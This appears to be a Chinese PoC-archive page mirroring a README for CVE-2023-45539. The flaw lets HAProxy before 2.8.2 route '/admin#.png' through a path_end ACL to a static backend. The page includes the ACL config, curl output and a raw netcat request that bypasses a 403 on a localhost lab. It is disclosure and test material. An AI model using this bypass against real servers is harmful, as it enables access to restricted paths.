关联漏洞
标题:
HAProxy 安全漏洞
(CVE-2023-45539)
描述:HAProxy是法国HAProxy公司的一款开源的TCP/HTTP负载均衡服务器。该服务器提供4层、7层代理,并能支持上万级别的连接,具有高效、稳定等特点。 HAProxy 2.8.2之前版本存在安全漏洞,该漏洞源于可能允许远程攻击者获取敏感信息或对path_end规则的误解产生未指定的其他影响。
描述
HAProxy-CVE-2023-45539-PoC
介绍
# HAProxy-CVE-2023-45539-PoC
HAProxy before 2.8.2 accepts # as part of the URI component, which might allow remote attackers to obtain sensitive information or have unspecified other impact upon misinterpretation of a path_end rule, such as routing index.html#.png to a static server.
What gets misrouted in this CVE isn't any extension that the backend app "supports" — it's only the ones that HAProxy itself is configured to route using path_end (or regex) ACLs.
```bash
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static
```
That means:
HAProxy doesn’t care whether the backend can actually serve .png, .js, etc.
It only looks at the suffix match in the request path.
If the suffix matches one of those strings, it routes to be_static.
So:
/admin#.png → matches .png → goes to be_static → bypass
/admin#.asc → doesn’t match → stays in be_app → hits deny → 403
```bash
curl -i http://localhost:6655/public
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain
APP OK
```
```bash
curl -i http://localhost:6655/admin
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
```
## Bypass
```bash
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain
STATIC OK (routed by path_end)
```
文件快照
[4.0K] /data/pocs/b09ba236ae650d0e38650109e1db1eb1bce059e3
├── [ 192] docker-compose.yaml
├── [ 769] haproxy.cfg
└── [1.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。